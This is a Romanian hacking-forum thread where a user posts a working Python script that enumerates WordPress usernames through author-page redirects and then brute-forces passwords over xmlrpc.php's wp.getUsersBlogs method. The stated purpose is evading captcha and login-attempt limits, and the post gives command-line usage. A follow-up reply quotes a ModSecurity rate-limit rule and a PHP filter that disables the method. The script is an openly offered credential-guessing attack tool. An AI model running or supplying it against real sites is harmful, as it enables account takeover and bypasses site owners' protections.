Jump to content
dancezar

xmlrpc wordpress bruteforce

By dancezar, in Programe hacking

Recommended Posts

  • Active Members
dancezar Newbie

dancezar

Posted
  • Active Members
Posted (edited) 


import urllib2
import Queue
import threading,sys

useri=[]
passwd=[]
url=""
work=0
stiva=Queue.Queue()
stiva_us=Queue.Queue()
def login(domain,user,passs):

	xml_post="<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>"+str(user)+"</string></value></param><param><value><string>"+str(passs)+"</string></value></param></params></methodCall>"
	re=urllib2.Request(domain,xml_post)
	try:
		ur=urllib2.urlopen(re)
		html=ur.read()
		if "Incorrect username" in html:
			return 0
		elif "isAdmin" in html:
			return 1
		elif "requested method " in html:
			print "[+] Modulul wp.getUsersBlogs e blocat!"
			exit()
		else:
			print "[!] unknow response"
			exit()
	except urllib2.URLError,e:
		print "[!] Erroare HTTP "+e.code()
		exit()
def enum(j):
	global work,stiva,url,useri
	while work==1:
		try:
			i=stiva.get(False)
			try:
				r=urllib2.Request(url+"?author="+str(i))
				u=urllib2.urlopen(r)
				redirect=u.geturl()
				if "/author/" in redirect:
						splited=redirect.split("/author/")
						us=splited[1].replace("/","")
						if us not in useri:
							useri.append(us)
							print us
			except urllib2.URLError,e:
				a=1
			if stiva.empty():
				return 0
		except Queue.Empty:
			pass
		else:
			stiva.task_done()

def brute(j):
	global bad,stiva_us,url,work
	while work==1:
		try:
			creds=stiva_us.get(False)
			rez=login(url,creds[0],creds[1])
			print str(creds[0])+" "+str(creds[1])
			if rez==1:
					print "[+] Got him ^~^ :"+str(creds[0])+" "+str(creds[1])
					work=0
		except Queue.Empty:
			pass
		else:
			stiva_us.task_done()

url=sys.argv[1]
passwd=open(sys.argv[3]).read().splitlines()
th=[]
th_br=[]
work=1
for i in range(4):
	t=threading.Thread(target=enum,args=(1,))
	th.append(t)
	t.start()
for i in range(12):
	stiva.put(i)
for i in th:
	i.join()
if len(useri)>0:
	print "[+] Am terminat de enumerat useri:"+str(len(useri))
	print "[+] Incep bruteforce"
else:
	print "[-] Nu s-au gasit useri voi incerca cu lista de useri"
	users=open(sys.argv[2]).read().splitlines()
	for user in users:
		useri.append(user)
	print "[+] Incep bruteforce"
print "[+] Testez daca exista xmlrpc.php"
r=urllib2.Request(url+"/xmlrpc.php")
try:
	ur=urllib2.urlopen(r)
except urllib2.URLError,e:
	print "[!] "+e.code()+" xmlrpc nu exista!"
	exit()
work=1
url+="/xmlrpc.php"
for us in useri:
	for p in passwd:
		stiva_us.put((us,p))
for t in range(int(sys.argv[4])):
	thr=threading.Thread(target=brute,args=(1,))
	th_br.append(thr)
	thr.start()
for t_j in th_br:
	t_j.join()
print "[+] EXIT!"

import urllib2 import Queue import threading,sys useri=[] passwd=[] url=" - Pastebin.com

Aveam nevoie de un bruteforcer pt wordpress care sa treaca de protectii precum capcha sau restrictie prin incercari repetate,mi-am amintit de un articol unde prezenta acest concent si m-am apucat sa fac un bruteforcer in python (nu sunt foarte talentat la python m-am apucat doar de 3 luni).Mai intai v-a incerca sa enumere useri ( aici mai trebuie lucrat nu scoate din titlu ci doar din redirect) , iar apoi v-a face bruteforce.


python wp_brute.py site.com userlist.txt passlist.txt NR_THREADS

Userlist.txt este necesar atunci cand nu a reusit sa enumere useri.

Eu l-am incercat pe 2 site-uri la care am stiut deja parola si pe localhost si a mers.:)

Edited by danyweb09
  • Upvote 1
Link to comment
Share on other sites
  • Active Members
dancezar Newbie

dancezar

Posted
  • Author
  • Active Members
Posted 
SecRule<br /> REQUEST_LINE "POST .*xmlrpc.*"<br /> "pass,initcol:ip=%{REMOTE_ADDR},setvar:ip.maxlimit=+1,deprecatevar:ip.maxlimit=1/600,nolog.....

etc.

ups :)

Inteleg ca maxim 600 de requesturi POST pentru xmlrpc , e cam deajuns ca sa faci un bruteforce rapid , singura metoda sigura sa eviti asta e:


<?php

add_filter( 'xmlrpc_methods', 'Remove_Unneeded_XMLRPC' );

function Remove_Unneeded_XMLRPC( $methods ) {
    unset( $methods['wp.getUsersBlogs'] );
    return $methods;
}

?>

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...